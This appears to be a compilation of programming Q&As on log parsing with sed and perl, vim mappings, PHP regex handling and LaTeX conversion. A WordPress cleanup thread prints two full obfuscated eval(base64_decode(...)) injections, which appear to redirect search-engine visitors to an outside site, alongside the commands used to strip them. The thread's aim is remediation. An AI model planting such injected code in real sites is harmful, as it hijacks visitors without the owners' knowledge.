How to extract block of XML from a log file on Linux - php

I have a log file that looks like the following:
2010-05-12 12:23:45 Some sort of log entry
2010-05-12 01:45:12 Request XML: <RootTag>
<Element>Value</Element>
<Element>Another Value</Element>
</RootTag>
2010-05-12 01:45:32 Response XML: <ResponseRoot>
<Element>Value</Element>
</ResponseRoot>
2010-05-12 01:45:49 Another log entry
What I want to do is extract the Request and Response XML (and ultimately dump them into their own single files). I had a similar parser that used egrep but the XML was all on one line, not multiple ones like above.
The log files are also somewhat large, hitting 500-600 megs a log. Smaller logs I would read in via a PHP script and use regex matching, but the amount of memory required for such a large file would more than likely kill the script.
Is there an easy way using the built-in tools on a Linux box (CentOS in this case) to extract multiple lines or am I going to have to bite the bullet and use Perl or PHP to read in the entire file to extract it?

# Example usage:
# perl script.pl data.xml RootTag > RootTag.xml
use strict;
use warnings;
my $tag = pop;
while (<>){
if ( s/.*(<$tag>)/$1/ .. s/(<(\/)$tag>).*/$1/ ){
print;
last if $2;
}
}
See the docs for details on the flip-flop operator.

Sounds like a job for sed (I was so tempted to say SuperSed ;-)
sed -n '/^<.\+>/H; /\(Request\|Response\) XML/{s/^.*</</;x;p}; ${x;p}' xmllog
where xmllog is your log file's name. You'll get a blank line at the beginning, but that can be filtered out with egrep '.+' or even just tail -n +2.
By way of explanation, sed is a little interpreter for programs that consist of a list of matching conditions and corresponding actions. sed runs through a file line by line (hence the name, "stream editor" -> "sed") and for each line, for each condition in the program that matches the text on the line, it applies the corresponding action. In this case:
/^<.\+>/
is a regular expression condition that matches any line which contains < followed by any character (.) repeated one or more times (\+) followed by > - basically any line with an XML tag. The associated action is H which appends the line to a "hold buffer". The other condition is
/\(Request\|Response\) XML/
which, of course, is a regexp that matches either Request or Response followed by a space and then XML. The corresponding action is
{s/^.*</</;x;p}
which first does a substitution (s) of the beginning of the line (^) followed by any character (.) repeated any number of times (*) followed by <, with just <. Basically that gets rid of anything before the first XML tag on the line. Then it switches (x) the line just read with the "hold buffer" (which contains the XML of the previous log message) and prints (p) the stuff that was just swapped in from the hold buffer. Finally,
$
matches the end of the input, and {x;p} again just swaps the contents of the hold buffer into the "print buffer" and then prints it.
You can alter the command to suit your needs, for example if you need something to delimit the different records, this'll put a blank line between them:
sed -n '/^<.\+>/H; /\(Request\|Response\) XML/{s/^.*</\n</;x;p}; ${x;p}' xmllog
(in that case, of course, don't use egrep to filter out the blank line at the beginning).

Your question implies you're not thinking right; if there's a way to do what you're asking in one language (there is) ... then you can do it in any language.
There's no reason to read the entire log into memory. You just read it line by line and extract the information you want. You just need to keep a state as to where you are (not in tag, inside RootTag, inside ResponseRoot, etc) and process the data as you wish.

Related

Deleting base64 Eval Junk with (osx) terminal

Trying to clean up after a slew of php injections -- every php function in about six sites worth of WordPress templates is full of junk.
I've got everything off the server, onto a local machine, and I'm hoping there should be a good way to delete all of the enormous code strings with terminal.
Of which I know approximately nothing.
http://devilsworkshop.org/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/ had good instructions for doing a clear on the server, but substituting my path/to/folder doesn't seem to be working in terminal.
Feeling I'm close, but, blind as I am to the ways of the terminal, that doesn't seem that comforting.
Based on the above, here's what I've got -- any help would be so amazingly appreciated.
grep -lr --include=*.php "eval(base64_decode" "/Users/Moxie/Desktop/portfolio-content" | xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'
UPDATED
derobert -- thanks a million for helping with this --
basically, the space after every <?php before the actual function had this inserted into it:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LnN0bHAuNHB1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
The characters change with each one, so a simple find and replace won't work (which was, I'm pretty sure, the point).
here is my code that proved as a valid solution.
I downloaded all the files to my local machine and started working on solution. Here is my solution {combination with what I goggled out}
#!/bin/bash
FILES=$(find ./ -name "*.php" -type f)
for f in $FILES
do
echo "Processing $f file LONG STRING"
sed -i 's#eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93a3BiLjI1dS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));##g' $f
echo "Processing $f file SMALL STRING"
sed -i 's#eval(base64_decode.*));##g' $f
done
save it somewhere as mybash.sh {from your favourite text editor}
$ sudo chmod +x mybash.sh //execute permission for script
$ ./mybash.sh
I have used the first one LONG STRING cause the pattern is always the same. Here is the explanation for the above code
s# - starting delimiter {#-delimiter same as / as in rule for sed}
eval(base64_decode.)); { first pattern to match, Reg Exp [. - Matches any single character], [ - Matches the preceding element zero or more times]}
# - second appearance of delimiter {#}, after # is empty which basically means replace first string {eval(base64_decode.*));} WITH {''}
#g - end of command, SED syntax
So, someone got access to write to arbitrary files on your server. I assume you've cleaned up the exploit that let them in already.
The problem is, while the eval(base64_decode stuff is obvious, and has to go, the intruder could have put other stuff in there. Who knows, maybe he deleted a mysql_real_escape_string somewhere, to leave you vulnerable to future SQL injection? Or a htmlspecialchars, leaving you vulnerable to JavaScript injection? Could have done anything. Might not even be PHP; you sure no JavaScript was added? Or embeds?
The best way to be sure is to compare to a known-good copy. You do have version control and backups, right?
Otherwise, you can indeed use perl -pi -e to do a substitute on that PHP code, though matching it might be difficult, depending. This might work (work on a copy!), and adjust spacing in the regexp as needed:
perl -pi -e 's!<\?php eval\(base64_decode\(.*?\)\) \?>!!g' *.php
but really, you should review each file by hand, to confirm there are no other exploits present. Even if your last known-good copies are somewhat old, you can review the diffs.
edit:
Ok, so it sounds like you don't want to nuke the whole PHP block, just the eval line:
perl -pi -e 's!eval\(base64_decode\(.*?\)\);!!g' *.php
You may want to add a \n before the first ! if there is additionally a newline to kill, etc. If the base64 actually has newlines in it, then you will need to add s after the g.

Setup a shortcut to replace easily selected strings in VIM

I have a lot of php/html files with many strings that should be internationalized with gettext.
Therefore, I have to go through each file, spot the "message" strings and replace each one by
<?= _("<my string>") ?>
I use vim and would like to setup a shortcut (map) to do it easily in insert mode (With CtrlR for instance).
Do you know how to achieve that ?
I would use Tim Pope's wonderful surround plugin to accomplish this.
Add the following to your ~/.vim/after/ftplugin/php.vim file:
let b:surround_{char2nr('_')} = "<?= _(\"\r\") ?>"
Now you can select some via visual mode then surround. e.g vitS_
If you are in insert mode you can surround text via <c-s>_ and you cursor will be inserted in between the double quotes.
As a bonus if you want to do the delete the surrounding <?= _("<text here>") ?> and only leave <text here> you can add the following to your ~/.vim/after/ftplugin/php.vim as well:
nmap <buffer> <silent> ds_ ds<dt(%df?[(xds"
Tim Pope has many great plugins I highly suggest you take a look some of them.
For more help see:
:h surround
:h surround-customizing
:h after-directory
:h curly-braces-names
:h b:var
My guess is that you want the original message to actually be the input to the _() function, do you not?
The best thing I can think for you to do is to use macros. If I were doing this I would probably do something like record a macro #1 for one-word "messages" (that need to be replaced), #2 for two-word messages, #3 for 3 and so on. Then I could just skim or search through the documents and type #1 on the start of any one-word message like one
to replace it with <?= _("one") ?>. I would use #2 on a message like two words to transform it to <?= _("two words") /> and so forth.
To create/record the macro for one-word messages, #1, type these keys, preferably on the start of a one-word message:
q1i<?= _("<Esc>eli") ?><Esc>q
q 1 i < ? = Space _ ( " Esc e l i " ) Space ? > Esc q
The macros for more words can be created very similarly, just add additional es for more words. So for #2, type this:
q1i<?= _("<Esc>eeli") ?><Esc>q
q 1 i < ? = Space _ ( " Esc e e l i " ) Space ? > Esc q
In the case of really long messages, I would probably use an open and close macro. The open one would place <?= _(" wherever I had my cursor and the close one would put ") ?> wherever I had my cursor.
If you want to surround this strings manually and if your message does not contain ", then you can (after putting cursor somewhere inside the message) do the following once:
qaf"a)<Esc>2F"i_(<Esc>q
(press real escape for <Esc>) then, after putting the cursor on the next message, repeat this by
#a
(if you don’t like a, replace it with another latin lowercase letter here and above after q). If you still want to have a mapping:
:nnoremap <C-r> f"a)<Esc>2F"i_(<Esc>
. This time <Esc> is literally <, E, s, c, >.
First is using macros and they are quite handy as defining a mapping is more to type. Depending on 'viminfo' option they may be even saved across vim sessions, but you should not really rely on this, so if you want something persistent use the mapping putting it in the vimrc.
Update: If you don’t have <? "message" ?> which I assumed, but instead got <tag>message</tag>, you can do the following:
:nnoremap <C-r> f<i") ?><Esc>F>a<? _("<Esc>
. Note that this time message should not contain < or >.
Regex
Vim is very capable of handling tasks like this with ease. Without a before and after example it's difficult to give you a precise solution, but I'll make a hypothetical one to demonstrate some of vim's power. Say you wanted to change any text inside a <span> tag to be executed by a PHP function. I might have a span tag like this:
<span>I need this text and all other span tags run through PHP!</span>
Probably the easiest way to get the job done is using regex. For example:
:%s/<span>\([^<]*\)<\/span>/<?= _("\1") ?>/g
This finds all span tags in the document and replaces them appropriately. You can even run this on multiple files (see :help bufdo). However, regex can be difficult for some people at first and many haven't taken the time to learn it well. Another option might look like this:
CTRL-R
/<span><cr>f>lct<<?= _("<C-r>"") ?><esc>
Step by step
/<span><cr> - search for opening span tags
f>l - move cursor to the character after the opening span tag
ct< - change the text until the next < character
<?= _("<C-r>"") ?> - put in what we want. The <C-r>" (as you referred to) will put in the contents of our unnamed register ", which in this case is the text we executed ct< on a minute ago.
<esc> - return to normal mode
Macro this
This might be useful to use as a macro. If so, just do the exact same thing with a macro around it...
qq/<span><cr>f>lct<<?= _("<C-r>"") ?><esc>q
Now you can execute #q to do the same thing to the next <span> tag. After you've used #q once you can also use ## or even 100#q to do it 100 times.

Apply a list of regular expressions in PHP

I have a long list of regular expressions in an ignore.txt, and another long list in an include.txt file. What would be the quickest way to apply these using PHP against data contained in a sample.html file such that any matches found in include are captured, but then anything matching in ignore.txt is excluded?
If your include.txt and ignore.txt files are setup so that they're only regular expressions, and there's one expression per line, you can use PHP's file() function. That will load the files into an array where each individual line is an element in the array. You can use file_get_contents() to load the sample.html file in as a string.
preg_match() or preg_match_all() do not actually take arrays as input, like preg_replace() does. You will need to loop over your array of expressions using something like foreach and applying an individual call to one of the matching functions to get your results.
I think preg_match_all() will suit your needs best, because it sounds like you're wanting to pull all of the matches out of the entire file, not just the first one. Once you have your full list of matches, then you'd apply your filter using the data from ignore.txt in a similar manner.
the quickest way would be to let the shell do the job
$result = `cat sample.html | egrep -f include.txt | egrep -vf ignore.txt`;

multi-line terminal progress indicator?

In a terminal, if I'm outputting a one-line progress indicator of some sort, in-place, \r would do the trick:
while (1) { echo "progress indication\r"; }
However, I have a progress indicator that really should be multi-line. As \r only returns to the start of the current line, I want something that can move up a couple of lines. Is there a control character/function that allows me to step back lines in the terminal?
Edit: in case I wasn't completely clear, I wish to have something roughly the opposite of \v, the vertical tab, which moves the terminal cursor down a line.
There is no control character to go back onto the previous line, but depending on the TERM= type a ANSI escape might do the trick.
echo -e "\033[2A"
Here's a list that might be more helpful: http://en.wikipedia.org/wiki/ANSI_escape_code and for usage in the shell http://www.linuxselfhelp.com/howtos/Bash-Prompt/Bash-Prompt-HOWTO-6.html

Replace all "\" characters which are *not* inside "<code>" tags

First things first: Neither this, this, this nor this answered my question. So I'll open a new one.
Please read
Okay okay. I know that regexes are not the way to parse general HTML. Please take note that the created documents are written using a limited, controlled HTML subset. And people writing the docs know what they're doing. They are all IT professionals!
Given the controlled syntax it is possible to parse the documents I have here using regexes.
I am not trying to download arbitrary documents from the web and parse them!
And if the parsing does fail, the document is edited, so it'll parse. The problem I am addressing here is more general than that (i.e. not replace patterns inside two other patterns).
A little bit of background (you can skip this...)
In our office we are supposed to "pretty print" our documentation. Hence why some came up with putting it all into Word documents. So far we're thankfully not quite there yet. And, if I get this done, we might not need to.
The current state (... and this)
The main part of the docs are stored in a TikiWiki database. I've created a daft PHP script which converts the documents from HTML (via LaTeX) to PDF. One of the must have features of the selected Wiki-System was a WYSIWYG editor. Which, as expected leaves us with documents with a less then formal DOM.
Consequently, I am transliterating the document using "simple" regexes. It all works (mostly) fine so far, but I encountered one problem I haven't figured out on my own yet.
The problem
Some special characters need to replaced by LaTeX markup. For exaple, the \ character should be replaced by $\backslash$ (unless someone knows another solution?).
Except while in a verbatim block!
I do replace <code> tags with verbatim sections. But if this code block contains backslashes (as is the case for Windows folder names), the script still replaces these backslashes.
I reckon I could solve this using negative LookBehinds and/or LookAheads. But my attempts did not work.
Granted, I would be better off with a real parser. In fact, it is something on my "in-brain-roadmap", but it is currently out of the scope. The script works well enough for our limited knowledge domain. Creating a parser would require me to start pretty much from scratch.
My attempt
Example Input
The Hello \ World document is located in:
<code>C:\documents\hello_world.txt</code>
Expected output
The Hello $\backslash$ World document is located in:
\begin{verbatim}C:\documents\hello_world.txt\end{verbatim}
This is the best I could come up with so far:
<?php
$patterns = array(
"special_chars2" => array( '/(?<!<code[^>]*>.*)\\\\[^$](?!.*<\/code>)/U', '$\\backslash$'),
);
foreach( $patterns as $name => $p ){
$tex_input = preg_replace( $p[0], $p[1], $tex_input );
}
?>
Note that this is only an excerpt, and the [^$] is another LaTeX requirement.
Another attempt which seemed to work:
<?php
$patterns = array(
"special_chars2" => array( '/\\\\[^$](?!.*<\/code>)/U', '$\\backslash$'),
);
foreach( $patterns as $name => $p ){
$tex_input = preg_replace( $p[0], $p[1], $tex_input );
}
?>
... in other words: leaving out the negative lookbehind.
But this looks more error-prone than with both lookbehind and lookahead.
A related question
As you may have noticed, the pattern is ungreedy (/.../U). So will this match only as little possible inside a <code> block? Considering the look-arounds?
If me, I will try to find HTML parser and will do with that.
Another option is will try to chunk the string into <code>.*?</code> and other parts.
and will update other parts, and will recombine it.
$x="The Hello \ World document is located in:\n<br>
<code>C:\documents\hello_world.txt</code>";
$r=preg_split("/(<code>.*?<\/code>)/", $x,-1,PREG_SPLIT_DELIM_CAPTURE);
for($i=0;$i<count($r);$i+=2)
$r[$i]=str_replace("\\","$\\backslash$",$r[$i]);
$x=implode($r);
echo $x;
Here is the results.
The Hello $\backslash$ World document is located in:
C:\documents\hello_world.txt
Sorry, If my approach is not suitable for you.
I reckon I could solve this using negative LookBehinds and/or LookAheads.
You reckon wrong. Regular expressions are not a replacement for a parser.
I would suggest that you pipe the html through htmltidy, then read it with a dom-parser and then transform the dom to your target output format. Is there anything preventing your from taking this route?
Parser FTW, ok. But if you can't use a parser, and you can be certain that <code> tags are never nested, you could try the following:
Find <code>.*?</code> sections of your file (probably need to turn on dot-matches-newlines mode).
Replace all backslashes inside that section with something unique like #?#?#?#
Replace the section found in 1 with that new section
Replace all backslashes with $\backslash$
Replace als <code> with \begin{verbatim} and all </code> with \end{verbatim}
Replace #?#?#?# with \
FYI, regexes in PHP don't support variable-length lookbehind. So that makes this conditional matching between two boundaries difficult.
Pandoc? Pandoc converts between a bunch of formats. you can also concatenate a bunch of flies together then covert them. Maybe a few shell scripts combined with your php scraping scripts?
With your "expected input" and the command pandoc -o text.tex test.html the output is:
The Hello \textbackslash{} World document is located in:
\verb!C:\documents\hello_world.txt!
pandoc can read from stdin, write to stdout or pipe right into a file.
Provided that your <code> blocks are not nested, this regex would find a backslash after ^ start-of-string or </code> with no <code> in between.
((?:^|</code>)(?:(?!<code>).)+?)\\
| | |
| | \-- backslash
| \-- least amount of anything not followed by <code>
\-- start-of-string or </code>
And replace it with:
$1$\backslash$
You'd have to run this regex in "singleline" mode, so . matches newlines. You'd also have to run it multiple times, specifying global replacement is not enough. Each replacement will only replace the first eligible backslash after start-of-string or </code>.
Write a parser based on an HTML or XML parser like DOMDocument. Traverse the parsed DOM and replace the \ on every text node that is not a descendent of a code node with $\backslash$ and every node that is a code node with \begin{verbatim} … \end{verbatim}.

Categories